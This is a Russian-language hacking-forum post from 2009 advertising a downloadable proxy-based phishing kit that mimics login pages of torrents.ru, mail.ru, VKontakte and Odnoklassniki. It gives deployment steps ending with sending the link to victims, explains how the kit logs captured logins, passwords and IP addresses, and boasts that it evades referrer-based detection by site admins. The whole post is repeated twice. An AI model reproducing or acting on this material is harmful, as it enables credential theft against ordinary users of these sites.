Ponchik
12.02.2009, 18:21
Эммм... Честно говоря вобще не нащёл куда положить это, но кажись в уязвимостях более менее смотриться...
Так вот, предлагаю вам универсальный фейк :)
Ложим его на хостинг с сокетами, пишем в него сайт, проксики для работы и он сам всё сделает, вот..
Придумал такое не я, предложили реализовать идею, я её токо реализовывал :)
http://dump.ru/file/1532414
http://rapidshare.com/files/197209760/multi_fake.rar.html
http://slil.ru/26637882
Заливаем на хостинг
Выставляем права на файл логов и конфиг
Заходим на скрипт фейка
Заполняем в него инфу
Рассылаем ссыль жертвам
#если нехотите юзать прокси пишите сайт, тоесть если фей для torrents.ru в прокси пишем torrents.ru:80
В отличии от фейка "Anyfake" бузи кодера мой использует прокси и в связи с этим не палится админами сайта по рефереру, т.к. картинки идут через прокси тоже
Как это работает?
Когда юзер заходит на фейк, скрипт проверяет существование файла настроек, если файл пустой или не существует, выводится страница настройки.
После того как всё настроено, скрипт проверяет ввел пользователь и логин и пароль или нет? Если ввел, тогда скрипт записывает время, IP, логин и пароль в файл-лог, который был указан при настройке скрипта и пользователя перекидывает на страницу входа, которая также была указана при настройке.
Если пользователь ничего не ввел, тогда из списка прокси серверов (тоже указанных при настройке скрипта) случайным образом выбирается 1 прокси сервер. Далее скрипт проверяет это запрос пользователя на фейк, или фейка на получение картинок и другого контента, если это пользователь, то скрипт посылает на прокси сервер запрос для получения страницы входа, которая указана в настройках (если прокси "мёртвый" скрипт записывает сообщение об этом в лог-файл) после получения страницы, скрипт обрабатывает её для изменения адресов картинок и форм для перехвата информации введённой пользователем. Также скрипт получает кодировку которая пришла в странице и отдаёт её пользователю, чтобы текст нормально отображался.
Примеры фейков:
torrents.ru
http://pic.ipicture.ru/uploads/090212/thumbs/h6W8zSI4AZ.jpg (http://pic.ipicture.ru/uploads/090212/h6W8zSI4AZ.jpg)
mail.ru
http://pic.ipicture.ru/uploads/090212/thumbs/KvTHXERsqZ.jpg (http://pic.ipicture.ru/uploads/090212/KvTHXERsqZ.jpg)
vkontakte.ru
http://pic.ipicture.ru/uploads/090212/thumbs/rkHTZAkUP1.jpg (http://pic.ipicture.ru/uploads/090212/rkHTZAkUP1.jpg)
odnoklassniki.ru
http://pic.ipicture.ru/uploads/090212/thumbs/i62FR4Sooq.jpg (http://pic.ipicture.ru/uploads/090212/i62FR4Sooq.jpg)
UPD
Фейк попал в журнал ксакепа :cool:
http://s59.radikal.ru/i164/0903/bb/53aa1dd4744ct.jpg (http://s59.radikal.ru/i164/0903/bb/53aa1dd4744c.jpg)
Так вот, предлагаю вам универсальный фейк :)
Ложим его на хостинг с сокетами, пишем в него сайт, проксики для работы и он сам всё сделает, вот..
Придумал такое не я, предложили реализовать идею, я её токо реализовывал :)
http://dump.ru/file/1532414
http://rapidshare.com/files/197209760/multi_fake.rar.html
http://slil.ru/26637882
Заливаем на хостинг
Выставляем права на файл логов и конфиг
Заходим на скрипт фейка
Заполняем в него инфу
Рассылаем ссыль жертвам
#если нехотите юзать прокси пишите сайт, тоесть если фей для torrents.ru в прокси пишем torrents.ru:80
В отличии от фейка "Anyfake" бузи кодера мой использует прокси и в связи с этим не палится админами сайта по рефереру, т.к. картинки идут через прокси тоже
Как это работает?
Когда юзер заходит на фейк, скрипт проверяет существование файла настроек, если файл пустой или не существует, выводится страница настройки.
После того как всё настроено, скрипт проверяет ввел пользователь и логин и пароль или нет? Если ввел, тогда скрипт записывает время, IP, логин и пароль в файл-лог, который был указан при настройке скрипта и пользователя перекидывает на страницу входа, которая также была указана при настройке.
Если пользователь ничего не ввел, тогда из списка прокси серверов (тоже указанных при настройке скрипта) случайным образом выбирается 1 прокси сервер. Далее скрипт проверяет это запрос пользователя на фейк, или фейка на получение картинок и другого контента, если это пользователь, то скрипт посылает на прокси сервер запрос для получения страницы входа, которая указана в настройках (если прокси "мёртвый" скрипт записывает сообщение об этом в лог-файл) после получения страницы, скрипт обрабатывает её для изменения адресов картинок и форм для перехвата информации введённой пользователем. Также скрипт получает кодировку которая пришла в странице и отдаёт её пользователю, чтобы текст нормально отображался.
Примеры фейков:
torrents.ru
http://pic.ipicture.ru/uploads/090212/thumbs/h6W8zSI4AZ.jpg (http://pic.ipicture.ru/uploads/090212/h6W8zSI4AZ.jpg)
mail.ru
http://pic.ipicture.ru/uploads/090212/thumbs/KvTHXERsqZ.jpg (http://pic.ipicture.ru/uploads/090212/KvTHXERsqZ.jpg)
vkontakte.ru
http://pic.ipicture.ru/uploads/090212/thumbs/rkHTZAkUP1.jpg (http://pic.ipicture.ru/uploads/090212/rkHTZAkUP1.jpg)
odnoklassniki.ru
http://pic.ipicture.ru/uploads/090212/thumbs/i62FR4Sooq.jpg (http://pic.ipicture.ru/uploads/090212/i62FR4Sooq.jpg)
UPD
Фейк попал в журнал ксакепа :cool:
http://s59.radikal.ru/i164/0903/bb/53aa1dd4744ct.jpg (http://s59.radikal.ru/i164/0903/bb/53aa1dd4744c.jpg)